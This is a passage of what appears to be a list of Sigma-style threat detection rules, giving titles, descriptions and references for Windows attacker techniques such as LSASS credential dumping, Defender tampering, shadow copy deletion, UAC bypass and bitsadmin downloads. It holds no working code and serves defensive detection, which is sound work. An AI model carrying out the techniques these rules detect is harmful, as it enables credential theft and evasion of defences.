https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Suspicious Unblock-File |
Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2 |
Powershell Suspicious Win32_PnPEntity |
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md |
Replace Desktop Wallpaper by Powershell |
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.
This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md |
Delete Volume Shadow Copies via WMI with PowerShell - PS Script |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell |
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script |
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html |
Suspicious PowerShell WindowStyle Option |
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.
In some cases, windows that would typically be displayed when an application carries out an operation can be hidden.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md |
PowerShell Write-EventLog Usage |
Detects usage of the "Write-EventLog" cmdlet with the 'RawData' flag. The cmdlet can be leveraged to write malicious payloads to the EventLog and then retrieve them later for use |
https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/ |
Zip A Folder With PowerShell For Staging In Temp - PowerShell Script |
Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is often used by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
Detects SyncAppvPublishingServer process execution, which is often utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging |
Detects attempts to remove Windows Defender configuration using the 'Remove-MpPreference' cmdlet |
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
Tamper Windows Defender - ScriptBlockLogging |
Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://bidouillesecurity.com/disable-windows-defender-in-powershell/ |
Testing Usage of Uncommonly Used Port |
Adversaries may communicate using a protocol and port pairing that are typically not associated.
For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell, https://learn.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps |
Powershell Timestomp |
Adversaries may modify file time attributes to hide new files or changes to existing files.
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md, https://www.offensive-security.com/metasploit-unleashed/timestomp/ |
Powershell Token Obfuscation - Powershell |
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation |
https://github.com/danielbohannon/Invoke-Obfuscation |
User Discovery And Export Via Get-ADUser Cmdlet - PowerShell |
Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Potential Persistence Via PowerShell User Profile Using Add-Content |
Detects calls to the "Add-Content" cmdlet in order to modify the content of the user profile and potentially add suspicious commands for persistence |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md |
Abuse of Service Permissions to Hide Services Via Set-Service - PS |
Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Veeam Backup Servers Credential Dumping Script Execution |
Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. |
https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Usage Of Web Request Commands And Cmdlets - ScriptBlock |
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs |
https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell |
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript |
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script |
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) |
PowerShell WMI Win32_Product Install MSI |
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Windows Firewall Profile Disabled |
Detects when a user disables the Windows Firewall via a Profile to help evade defense. |
https://learn.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2022-ps, https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell, https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php, http://woshub.com/manage-windows-firewall-powershell/, https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html |
Winlogon Helper DLL |
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are
used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to
load and execute malicious DLLs and/or executables.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md |
Potential WinAPI Calls Via PowerShell Scripts |
Detects use of WinAPI functions in PowerShell scripts |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Windows Defender Exclusions Added - PowerShell |
Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions |
https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html |
WMImplant Hack Tool |
Detects parameters used by WMImplant |
https://github.com/FortyNorthSecurity/WMImplant |
Powershell WMI Persistence |
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545 |
WMIC Unquoted Services Path Lookup - PowerShell |
Detects a known WMI recon method to look for unquoted service paths, often used by pentesters and attackers inside PowerShell enumeration scripts |
https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Suspicious X509Enrollment - Ps Script |
Detects use of X509Enrollment |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115 |
Powershell XML Execute Command |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests |
CMSTP Execution Process Access |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
HackTool - CobaltStrike BOF Injection Pattern |
Detects a typical pattern of a CobaltStrike BOF which injects into other processes |
https://github.com/boku7/injectAmsiBypass, https://github.com/boku7/spawn |
HackTool - Generic Process Access |
Detects process access requests from hacktool processes based on their default image name |
https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158, https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html |
HackTool - LittleCorporal Generated Maldoc Injection |
Detects the process injection of a LittleCorporal generated Maldoc. |
https://github.com/connormcgarr/LittleCorporal |
HackTool - HandleKatz Duplicating LSASS Handle |
Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles |
https://github.com/codewhitesec/HandleKatz |
Lsass Memory Dump via Comsvcs DLL |
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. |
https://twitter.com/shantanukhande/status/1229348874298388484, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ |
HackTool - SysmonEnte Execution |
Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon |
https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html, https://github.com/codewhitesec/SysmonEnte/, https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png |
LSASS Memory Access by Tool With Dump Keyword In Name |
Detects LSASS process access requests from a source process with the "dump" keyword in its image name. |
https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz |
Potential Credential Dumping Activity Via LSASS |
Detects process access requests to the LSASS process with specific call trace calls and access masks.
This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
|
https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md, https://research.splunk.com/endpoint/windows_possible_credential_dumping/ |
Credential Dumping Activity By Python Based Tool |
Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz. |
https://twitter.com/bh4b3sh/status/1303674603819081728, https://github.com/skelsec/pypykatz |
Remote LSASS Process Access Through Windows Remote Management |
Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz. |
https://pentestlab.blog/2018/05/15/lateral-movement-winrm/ |
Suspicious LSASS Access Via MalSecLogon |
Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right. |
https://twitter.com/SBousseaden/status/1541920424635912196, https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml, https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html |
Potentially Suspicious GrantedAccess Flags On LSASS |
Detects process access requests to LSASS process with potentially suspicious access flags |
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Credential Dumping Attempt Via WerFault |
Detects an LSASS process memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for Windows 10, Server 2016 and up. |
https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507 |
LSASS Access From Potentially White-Listed Processes |
Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference.
|
https://twitter.com/_xpn_/status/1491557187168178176, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz, https://twitter.com/mrd0x/status/1460597833917251595 |
Uncommon Process Access Rights For Target Image |
Detects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
|
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights |
Potential Direct Syscall of NtOpenProcess |
Detects potential calls to NtOpenProcess directly from NTDLL. |
https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6 |
Credential Dumping Attempt Via Svchost |
Detects when a process tries to access the memory of svchost to potentially dump credentials. |
Internal Research |
Suspicious Svchost Process Access |
Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service. |
https://github.com/hlldz/Invoke-Phant0m, https://twitter.com/timbmsft/status/900724491076214784 |
Function Call From Undocumented COM Interface EditionUpgradeManager |
Detects function calls from the EditionUpgradeManager COM interface, which is an interface not used by standard executables. |
https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/, https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611 |
UAC Bypass Using WOW64 Logger DLL Hijack |
Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) |
https://github.com/hfiref0x/UACME |
Compress Data and Lock With Password for Exfiltration With 7-ZIP |
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
7Zip Compressing Dump Files |
Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Potential DLL Injection Via AccCheckConsole |
Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI.
One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc.
The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass them via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
|
https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340, https://twitter.com/bohops/status/1477717351017680899?s=12, https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/ |
Suspicious AddinUtil.EXE CommandLine Execution |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon Child Process Of AddinUtil.EXE |
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon AddinUtil.EXE CommandLine Execution |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
AddinUtil.EXE Execution From Uncommon Directory |
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. |
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Potential Adplus.EXE Abuse |
Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/, https://twitter.com/nas_bench/status/1534916659676422152, https://twitter.com/nas_bench/status/1534915321856917506 |
AgentExecutor PowerShell Execution |
Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument |
https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1 |
Suspicious AgentExecutor PowerShell Execution |
Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument |
https://twitter.com/lefterispan/status/1286259016436514816, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/, https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension, https://twitter.com/jseerden/status/1247985304667066373/photo/1 |
Uncommon Child Process Of Appvlp.EXE |
Detects uncommon child processes of Appvlp.EXE
Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
or to mark a file as a system file.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/ |
AspNetCompiler Execution |
Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Suspicious Child Process of AspNetCompiler |
Detects potentially suspicious child processes of "aspnet_compiler.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler |
Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. |
https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/, https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ |
Uncommon Assistive Technology Applications Execution Via AtBroker.EXE |
Detects the start of non-built-in assistive technology applications via "Atbroker.EXE". |
http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ |
Hiding Files with Attrib.exe |
Detects usage of attrib.exe to hide files from users. |
https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/, https://www.uptycs.com/blog/lolbins-are-no-laughing-matter |
Set Suspicious Files as System Files Using Attrib.EXE |
Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files, to hide them from users and prevent their deletion with simple rights. The rule limits the search to specific extensions and directories to avoid FPs.
|
https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4, https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/ |
Interactive AT Job |
Detects an interactive AT job, which may be used as a form of privilege escalation. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md, https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html |
Audit Policy Tampering Via NT Resource Kit Auditpol |
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
|
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol |
Audit Policy Tampering Via Auditpol |
Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
|
https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ |
Indirect Inline Command Execution Via Bash.EXE |
Detects execution of the Microsoft bash launcher with the "-c" flag.
This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
|
https://lolbas-project.github.io/lolbas/Binaries/Bash/ |
Indirect Command Execution From Script File Via Bash.EXE |
Detects execution of the Microsoft bash launcher without any flags in order to execute the content of a bash script directly.
This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
|
https://lolbas-project.github.io/lolbas/Binaries/Bash/, https://linux.die.net/man/1/bash, Internal Research |
Boot Configuration Tampering Via Bcdedit.EXE |
Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step (for example disabling recovery options) before launching ransomware. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html |
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE |
Detects potential malicious and unauthorized usage of bcdedit.exe |
https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set, https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2 |
Data Export From MSSQL Table Via BCP.EXE |
Detects the execution of the BCP utility in order to export data from the database.
Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
|
https://docs.microsoft.com/en-us/sql/tools/bcp-utility, https://asec.ahnlab.com/en/61000/, https://asec.ahnlab.com/en/78944/, https://www.huntress.com/blog/attacking-mssql-servers, https://www.huntress.com/blog/attacking-mssql-servers-pt-ii, https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ |
Suspicious Child Process Of BgInfo.EXE |
Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ |
BitLockerTogo.EXE Execution |
Detects the execution of "BitLockerToGo.EXE".
BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature covers the encryption of USB flash drives, SD cards, external hard disk drives and other drives formatted with the NTFS, FAT16, FAT32 or exFAT file system.
This is a rarely used application and usage of it at all is worth investigating.
Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
|
https://tria.ge/240521-ynezpagf56/behavioral1, https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091, https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/, https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/ |
Uncommon Child Process Of BgInfo.EXE |
Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/, https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ |
Suspicious Download From Direct IP Via Bitsadmin |
Detects usage of bitsadmin downloading a file using a URL that contains an IP address instead of a hostname |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
File Download Via Bitsadmin |
Detects usage of bitsadmin downloading a file |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ |
Suspicious Download From File-Sharing Website Via Bitsadmin |
Detects usage of bitsadmin downloading a file from a suspicious domain |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
File With Suspicious Extension Downloaded Via Bitsadmin |
Detects usage of bitsadmin downloading a file with a suspicious extension |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ |
File Download Via Bitsadmin To A Suspicious Target Folder |
Detects usage of bitsadmin downloading a file to a suspicious target folder |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
File Download Via Bitsadmin To An Uncommon Target Folder |
Detects usage of bitsadmin downloading a file to an uncommon target folder |
https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ |
Monitoring For Persistence Via BITS |
BITS allows a job to specify a command (via the /SetNotifyCmdLine switch) that is executed after a successful download in order to signal that the job is finished.
When the job completes on the system, the command specified in the BITS job is executed.
This can be abused by actors to create a backdoor on the system and to establish persistence.
The download of malware or additional binaries is chained into a BITS job, and the program is executed once it has been downloaded.
|
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html, http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html, https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394 |
Potential Data Stealing Via Chromium Headless Debugging |
Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control |
https://github.com/defaultnamehere/cookie_crimes/, https://mango.pdf.zone/stealing-chrome-cookies-without-a-password, https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/, https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ |
Browser Execution In Headless Mode |
Detects execution of Chromium based browser in headless mode |
https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
File Download with Headless Browser |
Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files |
